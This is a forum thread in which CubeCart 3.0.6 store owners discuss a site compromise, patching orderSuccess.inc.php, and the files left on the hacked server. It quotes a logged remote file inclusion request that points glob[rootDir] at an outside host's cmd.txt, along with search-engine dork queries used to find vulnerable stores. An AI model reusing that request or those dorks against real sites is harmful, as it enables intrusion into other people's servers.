Jump to content

My site was hacked


Guest woodbtreasures

Recommended Posts

Guest woodbtreasures

How the hell do I fix this now?

http://www.wood-b-treasures.com/

This is just f*cking wonderful. */*

From my server logs I found 3 sites trying to access via //includes/ordersuccess... at 17 different times.

Appearantly one was successful

Blacklist these IP's on your sever...though I doubt that it will do any good.

153.5.37.202

62.141.50.117

82.59.68.239

Link to comment
Share on other sites

Guest woodbtreasures

http://wood-b-treasures.com//includes/orde...order_id=1&glob[rootDir]=http://www.illusor.altervista.org/cmd.txt?

_START_ 1,"login" => 1,"logout" => 1,"forgotPass" => 1,"account" => 1,"profile" => 1,"changePass" => 1,"newsletter" => 1,"cart" => 1,"step1" => 1,"step2" => 1,"step3" => 1,"step4" => 1,"step5" => 1,"reg" => 1,"viewOrders" => 1,"viewOrder" => 1,"confirmed" => 1); ?> _END_

Fatal error: Cannot instantiate non-existent class: htmlmimemail in /home/wooddbd/public_html/includes/orderSuccess.inc.php on line 40

This is an example of one of the 17 different instances that I find in my server logs

Link to comment
Share on other sites

Guest woodbtreasures

Oh and BTW...I'm talking to myself right now, but I had applied brooky's fix that was sent out via email, but had not yet updated to 3.0.7 or anything else yet.

I had figured that was good enough.

Link to comment
Share on other sites

Guest woodbtreasures

Didn't lose any files, but this is still ridiculous.

This needs to be fixed!

Ok I was looking through my server files and everything is there and there is no alternate index page so I have no idea how the hell they are doing this.

Some sort of cross-site scripting perhaps?

God I'm screwed someone please help!

Link to comment
Share on other sites

Guest estelle

Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched.

Link to comment
Share on other sites

Guest radicalwheels

Did you guys put the fix into orderSuccess.inc.php, and still get hacked? Or did you not patch this file? It was stressed how important it was that the above file be patched.

I did, but had to change since I had customers checking out and getting errors and entering credit cards 2 and 3 times which lead to almost 3k in duplicate charges. I used Sir Williams fix at first.

Now (since he updated) the orderSuccess.inc.php is working again. So patched again...

Link to comment
Share on other sites

Guest gwizard

LOL, you were owned by script kiddies :)

Please insure that your PHP version is NO LESS then 4.1.0.

If my your host is cloaked as Linux and you are in fact running Windows then please insure that your host admin applied all the neccessary patches.

Also, if I were the host, I would apply IDS protection on the Router level that would deny frequent incoming from same IP's.

This looks as less CC issue as host issue.

Link to comment
Share on other sites

Yo Bro Your Site Is Fixed, I took the liberty to upload the new index.php file for you... ill go through and make sure there are no Ping-markers in any of the other files...

Link to comment
Share on other sites

EVERYONE THAT HAS BEEN HACKED CHECK YOUR INCLUDES FOLDER IF YOU FIND ANY FILES OUT OF PLACE DELETE THEM ASAP... YOUR SERVERS WILL BE USED FOR THE NEXT ATTACK IF YOU DO NOT... DELETE NOW...

PS. Wood-b-tresure you had 3 aha.php (contained a trojon) db.pl (could alter ANY of your database info) [email protected] (would be used on other servers alike) and finaly another folder was also in the includes called .tmp which again contained 2 other .pl scripts...

I have removed these and am looking for more... BUT EVERYONE SHOULD CHECK THEIR SERVERS NOW!!!!

Edited by aikdo
Link to comment
Share on other sites

One more note to Wood-be-tresure looking at OrderSuccess i found that it has not be patched with brookys Or Sir williams... That is where your vunrability has now shown up...

Link to comment
Share on other sites

Guest timecrisis

From links in your profile?

I would urger all to remove links to your sites from the forum.

It is bad practice (in my book) to post an links on dev forums like this one!

Link to comment
Share on other sites

Guest estelle

And they can find them through Google, at least all stores where the licence fee hasn't been paid.

Yet another reason why everyone should buy a licence!

Edited by estelle
Link to comment
Share on other sites

Guest woodbtreasures

Q: From where do they find our sites? :rolly:

Thank you Aikdo :)

Well I thought that I had successfully patched but all that I had done was to install that image upload patch that had been sent out via email.

So I guess it was my fault :)

As to how they found the site...according to my server access logs they came in from doing a search for

Powered by Cubecart 3.0.6...

Link to comment
Share on other sites

Guest deebee

Q: From where do they find our sites? :w00t:

Easy. Biggest search term on my stats today been "powered by cubecart 3.0.6" followed by "powered by cubecart" followed by "cubecart 3.0.6"

Link to comment
Share on other sites

same here

http://www.cubecart.com/site/forums/index.php?

allintext:powered by cubecart 3.0.

intext:"Powered by CubeCart 3.0.6" intitle:"Powered by CubeCart"

powered by cubecart 3.0.6

"Powered by CubeCart" 3.0.6 .edu

"powered by CubeCart 3.0.6"

intext:powered by CubeCart 3.0.6

Powered by Cubecart

All each used about 10 times luckily my sites are protected...

Link to comment
Share on other sites

I'm pleased the patch definitely works but as Sir Will says it is a barrier and not absolute fix. There is a possibility they could find a way to break the barrier.

I'm focused on making it even stronger and looking deeply into other possible vulnerabilities.

Appologies for your inconvenience and stress associated with this malicious attack. I can only strive to try and prevent anything like this from happening again.

Link to comment
Share on other sites

Guest timecrisis

Yes, I would advise people to

1: Get a licence

2: Don't post your site URL's on here

This is the first place black hats and script kiddies would look and they can read just aswell as you can...well the script kiddies maybe not =)

Good idea on the job advert Brooky...Thanks for the updates

Edited by timecrisis
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...